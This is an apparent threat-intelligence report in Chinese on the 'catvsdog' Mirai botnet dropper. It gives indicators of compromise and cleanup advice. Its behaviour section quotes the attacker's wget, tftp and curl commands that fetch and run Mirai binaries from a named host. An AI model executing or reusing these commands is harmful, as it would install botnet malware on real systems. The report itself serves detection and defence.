Elkeid-20220728-botnet-4 (catvsdog样本) 分析报告

简述

catvsdog是Mirai的启动脚本,会下载执行Mirai,主要建大规模僵尸网络进行DDos攻击。Mirai由于代码开源,不断产生了多种变体,往往与0/N-Day漏洞利用结合,具有很强的感染性。

样本类型

僵尸网络, 木马下载器

elkeid 样本ID

elkeid_20220728_botnet_4

捕获时间

  • 2022-07-28

最近活跃时间

  • 2022-11-18

已知入侵途径

  • 弱口令爆破

涉及样本

执行目录

  • /tmp
  • /var/run
  • /mnt
  • /root
  • /

样本

  • catvsdog.sh
  • 0xt984767.sh
  • meow.x86
  • meow.mips
  • meow.mpsl
  • meow.arm
  • meow.arm5
  • meow.arm6
  • meow.arm7
  • meow.ppc
  • meow.m68k
  • meow.sh4
  • meow.spc
  • meow.arc
  • meow.x86_64

主要行为

  • 下载启动脚本并赋权限执行
    • wget http://37.187.87.141/catvsdog.sh;chmod 777 catvsdog.sh;
    • tftp 37.187.87.141 -c get 0xt984767.sh;
    • sh catvsdog.sh
  • 启动脚本行为
    • 下载恶意文件
      • cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.187.87.141/MeowBins/meow.x86; curl -O http://37.187.87.141/MeowBins/meow.x86;
    • 恶意文件重命名
      • cat meow.x86 >meow
    • 赋权与执行
      • chmod +x *;./meow meow.Selfrep.x86

IOC

  • URL

    • http://37.187.87.141/catvsdog.sh
    • http://37.187.87.141/MeowBins/meow.x86(其他系统架构:meow.arm、meow.arm5、meow.arm6、meow.arm7、meow.68k、meow.sh4、meow.arc、meow.x86、meow.mips、meow.mspl、meow.spc)

  • SHA256

    • 69ea0d7139a5b7b67c1034856ec9215751edf251a00c5f523b77566c3b03c3cd
    • 4eaf68fa5363a97f243967b0d7e7f9e02875add6786fbb7c034b437b2e3022f4
    • ab93fc87e091762436f0fb0e5ff2587ce03a20874a4bf00788885fd88cf76247
    • 6269847b87cc4346d49767285fdf0d88c2d10b7786cd0735e76e8d4d163d74c6
    • 6d4a771a7d67f69700adc7a7b0c39c793f1a616874c893c5b6ef67026b25e11b
    • 63d7dc39dc34e6621379251315656432220addacf55904d7ebab78e45e4b77d5
    • 4114ada128539c0a2c1d2c5e9b6d5ef6ae1be440d4894aa2b7c5bed11abcc327
    • 423e1d75b90c3f8fe2bd40eadeb95cb9de02515b77066e7d1f5b22eeea47924e
    • a016021ca1b059b12243e197d10591e932dc63d20425d0ced6f1b0017aec2cbd
    • 36b596ab445848beb642dc85a17728d4023de6dc989300272072b7ea7fad6669

  • 攻击IP

    • 51.89.232.15
    • 145.239.11.75
    • 51.161.116.88
    • 54.39.107.123
    • 54.36.123.35
    • 51.89.194.93
    • 51.79.78.180
    • 51.79.98.76
    • 145.239.11.79
    • 54.37.83.165
    • 51.79.80.117
    • 54.37.80.220
    • 54.36.122.190
    • 51.68.204.182
    • 51.77.118.10
    • 54.37.80.227
    • 51.77.116.67
    • 54.36.120.229
    • 51.79.98.34
    • 51.89.194.160
    • 51.79.78.192
    • 54.39.49.96
    • 51.89.219.132
    • 145.239.11.62
    • 51.89.219.195
    • 51.77.118.44
    • 149.56.26.37
    • 145.239.11.61
    • 145.239.7.213

  • 回连ip

37.187.87.141

排查建议

  • 请先确认该文件是否为测试文件
  • 如果非业务行为请通过root登陆,并清理【rm】下载的文件
  • 排查 .bashrc .bash_profile .profile 系统启动项 crontab 等是否有被驻留,并做清理

参考链接

  • 69ea0d7139a5b7b67c1034856ec9215751edf251a00c5f523b77566c3b03c3cd
    • https://www.virustotal.com/gui/file/69ea0d7139a5b7b67c1034856ec9215751edf251a00c5f523b77566c3b03c3cd
  • 4eaf68fa5363a97f243967b0d7e7f9e02875add6786fbb7c034b437b2e3022f4
    • https://www.virustotal.com/gui/file/4eaf68fa5363a97f243967b0d7e7f9e02875add6786fbb7c034b437b2e3022f4
  • https://threatintelligence.guardicore.com/ip/37.187.87.141